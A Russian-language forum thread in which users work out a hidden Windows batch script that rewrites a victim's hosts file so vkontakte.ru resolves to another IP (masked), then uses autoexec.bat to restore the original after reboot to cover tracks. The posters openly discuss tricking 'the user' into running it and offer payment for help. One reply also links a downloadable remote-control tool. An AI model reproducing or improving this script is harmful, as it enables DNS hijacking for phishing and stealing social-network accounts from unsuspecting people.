Здравствуйте, есть батник Что нужно дописать или как сделать, чтоб через определенное время (например после перезагрузки) файл hosts снова становился прежним?
Всем спасибо. Насколько я понял обязательно исп. еще один батник А как нить его запустить вместе с предыдущим? Или может можно в предыдущий дописать строчку, которая б очищала hosts через 20 минут например? Если нет, то как заставить юзера открыть два батника (екзешника), это ведь уже проблематичней?
Не нужно ничего открывать. Как только откроет первый - из него извлекай второй и пиши в автозагрузку.
ОМГ, какой код? Выше тебе уже все написали. Code: echo blablabla >> %windir%\AUTOEXEC.BAT Таким макаром пиши куда угодно и что угодно. Бла-бла это текст, который ты запишешь в файл. В твоем случее это путь к батнику.
=Zeus=, может я сейчас конкретно туплю, но как я буду знать путь ко второму батнику у юзера? - вот так, насколько я понял, работать не будет?
Огризок, не подскажешь как? Возможно кто-нибудь поможет и даст подсказки по ICQ 598-774-29 пять, если нужно - заплачу. Спасибо.
Подскажите пожалуйста хоть кто-то, уже совсем отчаялся, никак не выходит вписать в первый батник второй, в котором идет очищение файла hosts после перезагрузки системы.
скачай вот эту прогу http://s0m.narod.ru/s0m27p_inst.zip делов наворотить там можно каких угодно! И в любой момент времени запустишь че хочешь!!!!!!
превад зиродэй Code: cmdow @ /HID @echo off copy %windir%\system32\drivers\etc\hosts %windir%\system32\drivers\etc\hosts.backup /y echo copy %windir%\system32\drivers\etc\hosts.backup %windir%\system32\drivers\etc\hosts /y >> %systemdrive%\autoexec.bat echo **.**.** www.vkontakte.ru > %windir%\system32\drivers\etc\hosts echo **.**.** vkontakte.ru >> %windir%\system32\drivers\etc\hosts
Создал батник, запустил, в hosts оно дописало, а вот после перезагрузки ничего не меняет. hosts остается прежним